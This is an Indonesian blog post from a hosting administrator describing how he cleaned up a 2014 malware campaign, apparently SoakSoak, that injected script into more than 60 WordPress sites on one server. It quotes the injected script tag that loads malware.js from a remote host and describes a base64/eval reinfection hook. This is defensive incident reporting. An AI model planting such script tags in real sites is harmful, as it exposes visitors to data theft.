Serangan Campaign Malware

Hari ini dipenghujung tahun 2014 ini adalah hari paling merepotkan selama mengelola salah satu Cloud milik LRsoft. Pasalnya server mendapat kado natal istimewa berupa malware yang menginfeksi 60 lebih website yang ada didalamnya, sehingga ketika domain web tersebut diakses via browser akan muncul peringatan block halaman dari layanan Google seperti gambar dibawah:

Block dari Google

Block dari Google

Cek di cek ternyata Malware tersebuat menyerang bagian header dari website, mengganti semua tag

</head>

dengan script malware yang disimpan di server lain

<script language="JavaScript" src="http://host/malware.js" type="text/javascript"></script>

dan jeleknya tag <head> juga tidak ditutup kembali -_-

Script tersebut berfungsi untuk mengambil informasi sensitif yang ada di browser (komputer) client, salah satu file milik WordPress yang terinfeksi. Cukup membuat pusing karena sebelumnya harus melakukan analisis terlebih dahulu terhadap filefile yang mencurigakan. Dari beberapa file yang terinfeksi ternyata script berbahayanya diletakkan di bagian <head> dengan menampilkan langsung URL lokasi malware dan di bagian footer dengan enkripsi fungsi base64_encode() dan dieksekusi oleh fungsi eval().

Yang diletakkan dibagian footer berfungsi untuk menjalankan kembali malware (menyisipkan script berbahaya di bagian <head>) jika suatu waktu script berbahaya yang diletakkan dalam file telah dihapus oleh admin. Mengingat ada banyak website yang ada dalam 1 server, dikali jumlah file yang ada dalam masing-masing website, tidak cukup waktu untuk mengecek satu per-satu file secara manual. Saya membuat script untuk melakukan pencarian filefile yang sudah terinfeksi dengan metode recursive scanning dengan kombinasi RegEx. Dengan script yang sama dapat memulihkan file-file yang terinfeksi dengan otomatis menghapus script berbahaya dari file tersebut.

Kini semua file sudah bersih, termasuk filefile pendukung lainnya yang digunakan oleh attacker untuk menyerang sudah dihapus. Tinggal menunggu tindakan dari Google (24 jam) untuk menghapus predikat Malware dari database Safe Browse mereka sehingga pengunjung dapat membuka kembali websitewebsite yang sebelumnya di blok oleh Google.

 

Reference : http://blog.sucuri.net/2014/12/soaksoak-malware-compromises-100000-wordpress-websites.html

 

Tinggalkan Balasan